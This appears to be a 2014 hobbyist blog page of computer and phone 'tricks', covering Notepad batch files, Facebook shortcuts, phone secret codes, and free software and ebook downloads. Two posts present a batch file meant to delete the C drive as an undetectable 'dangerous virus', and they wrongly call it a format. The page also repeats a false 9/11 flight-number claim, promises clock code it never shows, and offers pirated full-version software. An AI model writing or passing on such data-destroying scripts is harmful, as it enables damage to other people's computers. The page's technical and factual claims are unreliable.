Saturday 8 March 2014

How to Make a Folder Name of Con

How to Make a Folder Name of Con

Why can't we create folder named 'con' on desktop. Most of users do not know this task. If you want to do this task as normally we create new folders and rename them as we disappeared then try again and make a con folder. let's learn

 Steps

  1. You'll have to press the numbers of the number pad or else it won't work.


  2. Create a new folder, rename it CON but don't press enter yet. Hold down Alt and type 255 on the number pad and then press enter.


Way 2(desktop computers)

1
Go to command prompt in your computer and type md\\.\\c:\\con [Note: you can give whatever path you want in place of c:] . Voila the folder is created. Now to delete it, it can done only through the command prompt. Type rd\\.\\c:\con.

How to Make a Command Prompt Clock

How to Make a Command Prompt Clock

If you want to show off by programming a clock that opens in command prompt, this is how to do it. (Ignore the huge spacing I've made between the lines for the :CLOCK line and don't use copy-paste. It should only be one new row for each code line but the wikihow writing interface messed up the entire code and I had a hard time making it look almost normal.)

 Steps

  1. Open notepad (If you have Windows XP or older you could also open the built in DOS-editor by starting command prompt, writing edit.com and pressing enter).


  2. Write the following in the new document:

  3. Save it as clock.bat (Other names can also be used as long as the ending of the name is .bat). (If you are using notepad you might need to click the scroll menu that says "text document" and instead select "all files" before giving it a name.)

  4. Go to the folder where you saved the file and open it.

  5. There you have it - A command prompt window that displays the current time in hours, minutes, seconds and centiseconds. (That's right - Centiseconds, not microseconds or milliseconds.)

Saturday 1 March 2014

Keyboard Shortcuts For Facebook

Keyboard Shortcuts For Facebook


facebook keyboard shortcuts
Facebook is one of the most popular social networking site where most of us spend hours chatting and surfing on facebook. So here are some usefull facebook keyboard shortcuts for Google chrome and Mozilla Firefox users.

Mozilla Firefox

  • Shift+Alt+1: View your News Feed
  • Shift+Alt+2: View your own Profile
  • Shift+Alt+3: View pop-up of friend requests
  • Shift+Alt+4: View pop-up of messages
  • Shift+Alt+5: View pop-up of notifications
  • Shift+Alt+6: View Account Settings
  • Shift+Alt+7: View Privacy Settings
  • Shift+Alt+8: View Facebook’s own profile
  • Shift+Alt+9: Read latest Terms of Service agreement.
  • Shift+Alt+0: Open Facebook Help Center

Google Chrome

  • Alt+1: View your News Feed
  • Alt+2: View your own Profile
  • Alt+3: View pop-up of friend requests
  • Alt+4: View pop-up of messages
  • Alt+5: View pop-up of notifications
  • Alt+6: View Account Settings
  • Alt+7: View Privacy Settings
  • Alt+8: View Facebook’s own profile
  • Alt+9: Read latest Terms of Service agreement.

All Mobiles Secret Codes




Samsung Secret Codes

Software version: *#9999#
IMEI number: *#06#
Serial number: *#0001#
Battery status- Memory capacity : *#9998*246#
Debug screen: *#9998*324# - *#8999*324#
LCD kontrast: *#9998*523#


LG Secret Codes


LG all models test mode: Type 2945#*# on the main screen.
2945*#01*# Secret menu for LG
IMEI (ALL): *#06#
IMEI and SW (LG 510): *#07#
Software version (LG B1200): *8375#
Recount cheksum (LG B1200): *6861#
Factory test (B1200): #PWR 668
Simlock menu (LG B1200): 1945#*5101#
Simlock menu (LG 510W, 5200): 2945#*5101#
Simlock menu (LG 7020, 7010): 2945#*70001#


Motorola Secret Codes

IMEI number:
*#06#
Code to lock keys. Press together *7
Note: [] (pause) means the * key held in until box appears.
Select phone line - (use this to write things below the provider name):
[] [] [] 0 0 8 [] 1 []
Add phonebook to main menu:
[] [] [] 1 0 5 [] 1 []


Nokia Secret Codes

*#06# for checking the IMEI (International Mobile Equipment Identity).
*#7780# reset to factory settings.
*#67705646# This will clear the LCD display(operator logo).
*#0000# To view software version.
*#2820# Bluetooth device address.
*#746025625# Sim clock allowed status.
*#62209526# - Display the MAC address of the WLAN adapter. This is available only in the newer devices that supports WLAN.

Learn To Make Dangerous Virus In A Minute















In this post i will teach you to make simple yet very powerful or you can say dangerous computer virus using a batch file. No software is required to make this virus, Notepad is enough for it. The good thing about this virus is it is not detected by any AntiVirus.

What will this virus do ?  

You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus.

How to Make the virus ?

   1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y

   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.


Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

Top 5 Cool Notepad Tricks


notepad tricks
I had previously share some Interesting computer tricks as well as cool Batch file programs. In this post i will share with you guys some of the cool notepad tricks.As name suggest you don't require any program other then notepad. So lets get started.

1. World Trade Center Attack Trick

world trade center trick


The flight number of the plane that had hit World Trade Center on  (9/11) was Q33NY. Now we call this trick or a coincidence or something else but whatever it is you will be definately amazed by the this trick.

    1. Open Notepad and Type “Q33N” (without quotes) in capital letters.
    2. Increase the font size to 72.
    3. Change the Font to Wingdings.

2. Matrix Effect Trick

matrix effect trick
In this trick i will show you to make a batch file in notepad which will act as matrix effect that you might have seen in movies.Matrix effect is basically number flashes in green color.

    1. Open Noteapad and copy below code into it.

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

    2. Now save this file as Matrix.bat (name can be anything but .bat is must)
    3. Open your saved file and you will have matrix effect on your screen.

3. Creating Virus That Format C Drive

computer virus
In this trick we will be creating virus in notepad using batch file programming. This virus is really simple to create yet very dangerous. opening this file we delete or format C drive of your computer.

    1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y
 
    2. Then Save this file as virus.bat
    3. Now, running this file format C Drive.

4. Making Personal Diary Using Notepad 

notepad tricks
Here you will learn to use notepad as Digital diary or a log book to keep record of your daily work instead of using pen and paper.

    1. Open Notepad and Type .LOG (in capital Letters and press enter
    2. Save the program with any name and close it.
    3. Open the file again. Now you can see current date and time, This will happen every time you reopen notepad

5. Dancing Keyboard Led


keyboard dancing led

In this part i will show you to make interesting file using notepad which will make keyboard led to dance. basically we will be creating a visual basic script.

    1. Open Notepad and copy below codes into it.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
    2. Then save this file as dance.vbs (name can be anything but .vbs is must)
    3. Open your save file and see your keyboard led blinking like disco lights.

Saturday 22 February 2014

How to download software and tutorial video from prohacker9



Hi friends ... I’m Neeraj Kumar. today i’m show you how to download software and tutorial videos form prohacker9.blogspot.com  ! you know that this is the blog where you can find full version software,games,tips & tricks and tutorial videos ...



CamStudio v8.3.0 full version free download



CamStudio v8.3.0 is able to record all screen and audio activity on your computer and create industry standard AVI video files and using its built in SWF Producer can turn those AVIs into lean, mean, bandwidth friendly Streaming Flash videos.  CamStudio can also add high quality, anti aliased screen captions to your recordings in seconds and with the unique Video Annotation feature you can even personalise your videos by including a webcam movie of yourself picture in picture over your desktop. But all of these features would be worthless if CamStudio wasn't easy to use, fortunately that's not the case. CamStudio can be learned in a matter of minutes and comes with a comprehensive built in helpfile, so if you do manage to get stuck, you can simply hit  Help and get the answers you need.

CamStudio v8.3.0

 Features :

1. Use it to create demonstration videos for any software program.
2. Create video tutorials for school or college class.
3. Use it to record a recurring problem with your computer so you can show technical support people.
4. Use it to create video based information products you can sell.
5. Use it to record new tricks and techniques you discover on your favourite software program, before you forget them.


Password:www.downloadha.com


Friday 14 February 2014

HTML5 & CSS3 Ebook Free Download



Book Description
Whether you're building web pages, mobile apps, or desktop apps, you need to learn HTML5 and CSS3. So why wait? Hello! HTML5 & CSS3 is a smart, snappy, and fun way to get started now.

In this example-rich guide to HTML5 and CSS3, you'll start with a user-friendly introduction to HTML5 markup and then take a quick tour through forms, graphics, drag-and-drop, multimedia, and more. Next, you'll explore CSS3, including new features like drop shadows, borders, colors, gradients, and backgrounds. Every step of the way, you'll find hands-on examples, both large and small, to help you learn by doing.
Book Details
Publisher:
Manning
By:
Rob Crowther
ISBN:
978-1-935-18289-4
Year:
2012
Pages:
560
Language:
English
File size:
30.3 MB
File format:
PDF
 


HTML & CSS: The Good Parts Ebook Free Download



Book Description
HTML and CSS are the workhorses of web design, and using them together to build consistent, reliable web pages requires both skill and knowledge. The task is more difficult if you're relying on outdated, confusing, and unnecessary HTML hacks and workarounds. Author Ben Henick shows you how to avoid those traps by going beyond the standard tips, tricks, and techniques to connect the underlying theory and design of HTML and CSS to your everyday work habits.
Book Details
Publisher:
O'Reilly Media
By:
Ben Henick
ISBN:
978-0-596-15760-9
Year:
2010
Pages:
352
Language:
English
File size:
6.7 MB
File format:
PDF




Windows 8 Hacks Ebook Free Download


Book Description
Windows 8 is quite different than previous Microsoft operating systems, but it's still eminently hackable. With this book, you'll learn how to make a variety of modifications, from speeding up boot time and disabling the Lock screen to hacking native apps and running Windows 8 on a Mac. And that's just the beginning. You'll find more than 100 standalone hacks on performance, multimedia, networking, the cloud, security, email, hardware, and more. Not only will you learn how to use each hack, you'll also discover why it works.
Book Details
Publisher:
O'Reilly Media
By:
Preston Gralla
ISBN:
978-1-44932-575-6
Year:
2012
Pages:
422
Language:
English
File size:
44.9 MB
File format:
PDF




Saturday 8 February 2014

5 BEST AND FREE HTML EDITORS

                                       




                                         1. CoffeeCup Free HTML Editor
CoffeeCup Free HTML Editor
The CoffeeCup Free HTML Editor is a full-featured web design system. With built-in FTP uploading, wizards for tables, frames, fonts, and more, support for HTML5 and CSS3, and 100% valid code output, it’s a great tool for anyone who wants to design their own website.
Visit Their Website


2. HTML Kit
HTML Kit
HTML-Kit is a highly customizable editor software that you can use to create, edit, preview, validate and publish web pages and other types of text files. The full original version is available for Windows 95 – Windows 7, free of charge. Despite its name and the small download size, HTML-Kit is a multi-purpose development environment that has support for several scripting and programming languages.
Visit Their Website

3. Amaya
Amaya
Amaya is an open source software project hosted by W3C. Amaya is a Web editor, i.e. a tool used to create and update documents directly on the Web. Browsing features are seamlessly integrated with the editing and remote access features in a uniform environment. The Amaya software is written in C and is available for Windows, Unix platforms and MacOS X.
Visit Their Website

4. Notepad++
Notepad++
Notepad++ is a free source code editor and Notepad replacement that supports several languages. Notepad++ is written in C++ and uses pure Win32 API and STL which ensures a higher execution speed and smaller program size, also optimizing as many routines as possible without losing user friendliness.
Visit Their Website 


5. Komodo Edit
Komodo Edit
Komodo Edit is a fast, smart, free and open-source code editor. It runs on Windows, Mac, Linux platforms and supports PHP, Python, Ruby, JavaScript, Perl, Tcl, XML, HTML 5, CSS 3 with syntax coloring, folding, background syntax checking, and excellent auto-complete and calltips and many more options..
Visit Their Website